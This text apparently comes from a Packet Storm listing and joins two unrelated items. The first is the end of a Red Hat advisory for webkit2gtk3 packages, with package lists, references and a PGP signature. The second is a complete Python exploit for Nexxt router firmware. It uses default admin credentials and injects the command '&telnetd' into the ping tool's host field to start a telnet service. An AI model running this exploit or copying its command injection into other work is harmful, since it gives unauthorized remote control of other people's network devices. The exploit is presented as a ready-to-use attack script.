webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.1.aarch64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.1.aarch64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.1.aarch64.rpm

ppc64le:  
webkit2gtk3-2.36.7-1.el8_7.1.ppc64le.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_7.1.ppc64le.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_7.1.ppc64le.rpm  
webkit2gtk3-devel-2.36.7-1.el8_7.1.ppc64le.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.1.ppc64le.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_7.1.ppc64le.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.1.ppc64le.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.1.ppc64le.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.1.ppc64le.rpm

s390x:  
webkit2gtk3-2.36.7-1.el8_7.1.s390x.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_7.1.s390x.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_7.1.s390x.rpm  
webkit2gtk3-devel-2.36.7-1.el8_7.1.s390x.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.1.s390x.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_7.1.s390x.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.1.s390x.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.1.s390x.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.1.s390x.rpm

x86_64:  
webkit2gtk3-2.36.7-1.el8_7.1.i686.rpm  
webkit2gtk3-2.36.7-1.el8_7.1.x86_64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_7.1.i686.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_7.1.x86_64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_7.1.i686.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_7.1.x86_64.rpm  
webkit2gtk3-devel-2.36.7-1.el8_7.1.i686.rpm  
webkit2gtk3-devel-2.36.7-1.el8_7.1.x86_64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.1.i686.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.1.x86_64.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_7.1.i686.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_7.1.x86_64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.1.i686.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.1.x86_64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.1.i686.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.1.x86_64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.1.i686.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42856  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7VWL9zjgjWX9erEAQg3Gw//e0sGMYczRnNrkhBxX5J4lP7xUO+/+Pnk  
+ncXuaQpC5qToXl3w/YspsBZ8YCmNTso0WqIZjovsAbAQGgtAHh9tyrtheWkLiEf  
4dS4wocfSQOFjcmrNLVc+hECWUz9RfVuyt758uRzz/pLgKXgrIlVVnMhLk5qCYWD  
gkwYhOHBnWE1iRHVMgdFjwcsk7/V1Pcv3jGjGwy4anK+YbcWpEvHTOyT4E5gO5oj  
Fl6RU3M+cKDOcg5Uxmn5d1/MvWBvQOCu8RvJy5GPdfhZjoiWJKn43pS94Yz8RaMR  
MMa2txkibrcDalMzcFzGdWMcjnCrp30imqzrEdUbs0qeSXUgSjSUN2EEcSSOjnge  
MhkEbZTFHdGakJxWSLXLHP3YC7eJMrawDTzfUotVoQpw6uBNFZQeCrhP25gsTff3  
OSj/m3bCHSOlGZ7gVAFdLuHIomZHU6di66EFeSVIh56ukriNUkDfG3/3v8VYpSY6  
7F0PdLbbw5kW0VfOwuMrznRpzC1Vl2+r7hKBw+WqnYDr8xcI8CgObz+D64JXO3WX  
kFP9NqFYB9M4+5fB9SGcZ+0DUIPpf5w6qB4Wb+3k3IdYLXutUH61/2dCFnTxevKv  
EkVv+aTEcGDnyTgWV8FOTWXGhUBoCYgUbAHYxIbTX3TtIaMesZennJPRvQa63QAc  
nJngrnwCTog=+XpK  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0016-01

Nexxt Router Firmware version 42.103.1.5095 authenticated remote code execution exploit that enables telnetd.

    # Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)# Date: 19/10/2022# Exploit Author: Yerodin Richards# Vendor Homepage: https://www.nexxtsolutions.com/# Version: 42.103.1.5095# Tested on: ARN02304U8# CVE : CVE-2022-44149import requestsimport base64router_host = "http://192.168.1.1"username = "admin"password = "admin"def main():    send_payload("&telnetd")    print("connect to router using: `telnet "+router_host.split("//")[1]+ "` using known credentials")    passdef gen_header(u, p):    return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")def send_payload(payload):    url = router_host+"/goform/sysTools"    headers = {"Authorization": "Basic {}".format(gen_header(username, password))}    params = {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK"}    requests.post(url, headers=headers, data=params)if __name__ == '__main__':    main()

Source

Packet Storm